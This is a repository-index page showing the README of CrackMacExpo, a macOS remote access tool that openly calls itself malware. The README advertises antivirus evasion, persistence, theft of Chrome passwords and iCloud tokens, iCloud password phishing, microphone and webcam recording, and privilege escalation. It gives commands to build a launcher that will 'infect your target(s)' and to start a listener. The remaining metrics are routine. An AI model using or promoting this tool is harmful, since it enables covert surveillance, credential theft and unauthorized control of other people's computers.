https://github.com/byt3n33dl3/crackmacexpo

The most advanced Mach-O binary malware for macOS or Unix-based distro.

https://github.com/byt3n33dl3/crackmacexpo

Science Score: 13.0%

This score indicates how likely this project is to be science-related based on various indicators:

  • CITATION.cff file
  • codemeta.json file
    Found codemeta.json file
  • .zenodo.json file
  • DOI references
  • Academic publication links
  • Academic email domains
  • Institutional organization owner
  • JOSS paper metadata
  • Scientific vocabulary similarity
    Low similarity (13.3%) to scientific vocabulary

Keywords

crackmacexpo elf linux macos osmr osx pentesting rat shellcode
Last synced: 5 months ago · JSON representation

Repository

The most advanced Mach-O binary malware for macOS or Unix-based distro.

Basic Info
Statistics
  • Stars: 43
  • Watchers: 1
  • Forks: 0
  • Open Issues: 0
  • Releases: 2
Topics
crackmacexpo elf linux macos osmr osx pentesting rat shellcode
Created almost 2 years ago · Last pushed over 1 year ago
Metadata Files
Readme Funding License Code of conduct

README.md

CrackMacExpo

GUI frontend and CLI RAT, a Remote Access Tool for MacOS or OSX distro. Penetrate the SSL and Security system of OSX distro with a sharp IPA's Malware, Specialized for Apple.

MacOS & OSX

License LPT-Master Python Issues Contributing

Features

  • Emulate a terminal instance
  • Simple extendable Module system
  • Undetected by Anti Virus ( OpenSSL AES-256 encrypted payloads )
  • Persistent
  • GUI and CLI support
  • Retrieve Chrome passwords
  • Retrieve iCloud tokens and contacts
  • Monitor the clipboard
  • Retrieve browser history ( Chrome and Safari )
  • Phish for iCloud passwords via iTunes
  • iTunes ( iOS ) backup enumeration
  • Record the microphone
  • Take a desktop screenshot or picture using the webcam
  • Attempt to get root via local privilege escalation

How To Use

```python

Clone or download this repository

$ git clone https://github.com/pxcs/CrackMacExpo

Go into the repository

$ cd CrackMacExpo

Install dependencies required by the server

$ sudo pip install -r requirements.txt

Start the GUI

$ python crackmacexpo.py

Lastly, run a built launcher on your target(s)

```

Warning: Because payloads are created unique to the target system ( Automatically by the server ), the server must be running when any bot connects for the first time.

Advanced users

There's also a CLI for those who want to use this over SSH: ```python

Create a launcher to infect your target(s)

$ python crackmacexpo.py --builder

Start the CLI

$ python crackmacexpo.py --cli --port 443

Lastly, run a built launcher on your target(s)

```

Issues

Feel free to submit any issues or feature requests here.

Contribution

For a simple guide on how to create modules click here.

Certifications Related

OSMR | Offensive Security macOS Researcher
GXPN | GIAC Exploit Researcher and Advanced Penetration Tester
eCPPT | INE Security Certified Professional Penetration Tester
eCPPTv2 | INE Security Certified Professional Penetration Tester v2
CᴵEH (Master) | Certified Ethical Hacker (Master)
LᴵPT (Master) | Licensed Penetration Tester (Master)

Credits

Contact Me

  • pxmxx3csz@outlook.com

Owner

  • Name: Sulaiman
  • Login: byt3n33dl3
  • Kind: user
  • Location: Error 403: Not on earth

I N F R A X 8 6

GitHub Events

Total
  • Watch event: 24
  • Fork event: 1
Last Year
  • Watch event: 24
  • Fork event: 1

Issues and Pull Requests

Last synced: 10 months ago

All Time
  • Total issues: 0
  • Total pull requests: 0
  • Average time to close issues: N/A
  • Average time to close pull requests: N/A
  • Total issue authors: 0
  • Total pull request authors: 0
  • Average comments per issue: 0
  • Average comments per pull request: 0
  • Merged pull requests: 0
  • Bot issues: 0
  • Bot pull requests: 0
Past Year
  • Issues: 0
  • Pull requests: 0
  • Average time to close issues: N/A
  • Average time to close pull requests: N/A
  • Issue authors: 0
  • Pull request authors: 0
  • Average comments per issue: 0
  • Average comments per pull request: 0
  • Merged pull requests: 0
  • Bot issues: 0
  • Bot pull requests: 0
Top Authors
Issue Authors
Pull Request Authors
Top Labels
Issue Labels
Pull Request Labels